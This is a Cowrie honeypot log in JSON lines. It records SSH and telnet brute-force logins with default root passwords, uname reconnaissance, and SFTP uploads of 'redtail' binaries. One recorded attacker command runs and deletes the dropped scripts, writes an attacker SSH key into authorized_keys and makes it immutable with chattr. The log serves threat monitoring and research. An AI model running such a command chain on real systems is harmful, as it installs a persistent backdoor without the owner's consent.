{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:37.359206Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:38.231722Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
{"eventid":"cowrie.session.closed","duration":30.353196144104004,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:38.250633Z","src_ip":"8.222.212.69","session":"19050c330cb3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:38.771939Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:25:38.772612Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:38.993410Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:38.994603Z","src_ip":"212.227.125.160","session":"27327ec9fd4d"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":60402,"dst_ip":"1.2.3.4","dst_port":23,"session":"08c3998ce7bd","protocol":"telnet","message":"New connection: 8.222.212.69:60402 (1.2.3.4:23) [session: 08c3998ce7bd]","sensor":"my-vps","timestamp":"2025-08-28T06:25:41.509454Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:41.946925Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-28T06:25:41.947756Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:41.997346Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.045923Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.048355Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.051261Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.i686","outfile":"var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","shasum":"ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","message":"SFTP Uploaded file \"redtail.i686\" to var/lib/cowrie/downloads/ee7a31fb0d3c29ca435f08fd147a434c6db921b69d32c8894539a8199b0b15c0","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.054063Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.x86_64","outfile":"var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","shasum":"d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","message":"SFTP Uploaded file \"redtail.x86_64\" to var/lib/cowrie/downloads/d6e0eb28cfe1b224f061eff0581091dac985516c78d222f4921587d2ec612010","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.056841Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.file_upload","filename":"setup.sh","outfile":"var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","shasum":"783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","message":"SFTP Uploaded file \"setup.sh\" to var/lib/cowrie/downloads/783adb7ad6b16fe9818f3e6d48b937c3ca1994ef24e50865282eeedeab7e0d59","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.057934Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.closed","duration":"11.1","message":"Connection lost after 11.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:42.107106Z","src_ip":"212.227.125.160","session":"cf987cc193ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43148,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c2fd74cf1c5","protocol":"ssh","message":"New connection: 212.227.235.229:43148 (1.2.3.4:22) [session: 9c2fd74cf1c5]","sensor":"my-vps","timestamp":"2025-08-28T06:25:43.755725Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:43.756515Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:44.006565Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44398,"dst_ip":"1.2.3.4","dst_port":23,"session":"89667c9c1f20","protocol":"telnet","message":"New connection: 212.227.235.229:44398 (1.2.3.4:23) [session: 89667c9c1f20]","sensor":"my-vps","timestamp":"2025-08-28T06:25:44.081621Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@wsx","message":"login attempt [root/1qaz@wsx] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:44.757748Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:45.403406Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:25:45.404150Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:45.654979Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:45.656044Z","src_ip":"212.227.235.229","session":"9c2fd74cf1c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49356,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9af0c897a1d","protocol":"ssh","message":"New connection: 212.227.125.160:49356 (1.2.3.4:22) [session: e9af0c897a1d]","sensor":"my-vps","timestamp":"2025-08-28T06:25:53.263369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:53.267368Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:25:53.493480Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30189,"dst_ip":"1.2.3.4","dst_port":22,"session":"222bd91a71a0","protocol":"ssh","message":"New connection: 212.227.125.160:30189 (1.2.3.4:22) [session: 222bd91a71a0]","sensor":"my-vps","timestamp":"2025-08-28T06:25:53.556454Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T06:25:53.557361Z","src_ip":"212.227.125.160","session":"222bd91a71a0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T06:25:53.638545Z","src_ip":"212.227.125.160","session":"222bd91a71a0"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T06:25:54.069269Z","src_ip":"212.227.125.160","session":"222bd91a71a0"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:25:54.386729Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:25:54.931168Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:25:54.931851Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:55.152679Z","src_ip":"212.227.125.160","session":"222bd91a71a0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:55.157891Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:25:55.159034Z","src_ip":"212.227.125.160","session":"e9af0c897a1d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38052,"dst_ip":"1.2.3.4","dst_port":22,"session":"c322a0075400","protocol":"ssh","message":"New connection: 212.227.235.229:38052 (1.2.3.4:22) [session: c322a0075400]","sensor":"my-vps","timestamp":"2025-08-28T06:25:59.826494Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:25:59.827376Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:00.080245Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.login.success","username":"root","password":"P@ssword","message":"login attempt [root/P@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T06:26:01.133903Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T06:26:01.659826Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T06:26:01.660564Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:01.914557Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:01.915707Z","src_ip":"212.227.235.229","session":"c322a0075400"}
{"eventid":"cowrie.session.connect","src_ip":"8.222.212.69","src_port":32960,"dst_ip":"1.2.3.4","dst_port":23,"session":"442cff4e669d","protocol":"telnet","message":"New connection: 8.222.212.69:32960 (1.2.3.4:23) [session: 442cff4e669d]","sensor":"my-vps","timestamp":"2025-08-28T06:26:04.482395Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35684,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd0759ac183","protocol":"ssh","message":"New connection: 212.227.125.160:35684 (1.2.3.4:22) [session: 5bd0759ac183]","sensor":"my-vps","timestamp":"2025-08-28T06:26:09.845444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T06:26:09.857853Z","src_ip":"212.227.125.160","session":"5bd0759ac183"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T06:26:10.067349Z","src_ip":"212.227.125.160","session":"5bd0759ac183"}
{"eventid":"cowrie.login.failed","username":"user1","password":"123456","message":"login attempt [user1/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T06:26:10.944443Z","src_ip":"212.227.125.160","session":"5bd0759ac183"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:12.165156Z","src_ip":"212.227.125.160","session":"5bd0759ac183"}
{"eventid":"cowrie.session.closed","duration":30.9631826877594,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:12.472553Z","src_ip":"8.222.212.69","session":"08c3998ce7bd"}
{"eventid":"cowrie.session.closed","duration":31.13214683532715,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T06:26:15.213682Z","src_ip":"212.227.235.229","session":"89667c9c1f20"}
